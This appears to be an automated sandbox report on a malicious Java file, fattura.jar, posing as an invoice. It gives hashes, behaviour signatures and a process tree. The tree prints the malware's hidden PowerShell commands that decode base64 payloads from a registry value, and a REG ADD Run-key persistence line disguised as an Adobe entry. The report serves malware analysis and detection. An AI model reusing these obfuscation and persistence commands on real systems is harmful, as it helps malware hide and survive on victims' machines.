Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    29-06-2020 18:10

General

  • Target

    fattura.jar

  • Size

    222KB

  • MD5

    9f4c61b914d5174226a6591f9e9a2a48

  • SHA1

    558fa0ea8e2ea1c3c6b618789a88081eebeeab4c

  • SHA256

    eb76c8ea9c1857530e537b318eeac0781f7bbc68ad9e0152bcb2db5a8af71d97

  • SHA512

    f433da3b79fdd9f135094fc546988f81f535793a01b3b73803d7ed5f9b6e6eaacc685ee50e73ff7e3c066deeab7208ff64b55e7a5bc704966f8820b6a8dd81fc

Score
8/10

Malware Config

Signatures

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Modifies registry class 1 IoCs
  • Adds Run entry to start application 2 TTPs 8 IoCs
  • Drops startup file 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Blacklisted process makes network request 26 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\SYSTEM32\wscript.exe
      wscript C:\Users\Admin\bjzxzjbyqj.vbs
      2⤵
      • Modifies registry class
      • Adds Run entry to start application
      • Suspicious use of WriteProcessMemory
      PID:816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1072
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs"
        3⤵
        • Adds Run entry to start application
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        • Blacklisted process makes network request
        PID:2488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:3256
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
          "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version
          4⤵
            PID:2128
        • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
          "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
          3⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious use of SetWindowsHookEx
          PID:2748
          • C:\Windows\SYSTEM32\REG.exe
            REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Adobe Java bridge" /d "C:\Users\Admin\AppData\Roaming\Adobe\AIR\jre13v3bridge.jar"
            4⤵
            • Modifies registry key
            • Adds Run entry to start application
            PID:3084

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • C:\Users\Admin\AppData\Local\Temp\output.txt
    • C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
    • C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs
    • C:\Users\Admin\bjzxzjbyqj.vbs
    • memory/816-1-0x0000000000000000-mapping.dmp
    • memory/1072-3-0x0000000000000000-mapping.dmp
    • memory/1928-6-0x0000000000000000-mapping.dmp
    • memory/2128-7-0x0000000000000000-mapping.dmp
    • memory/2488-4-0x0000000000000000-mapping.dmp
    • memory/2748-11-0x0000000000000000-mapping.dmp
    • memory/3084-15-0x0000000000000000-mapping.dmp
    • memory/3256-16-0x0000000000000000-mapping.dmp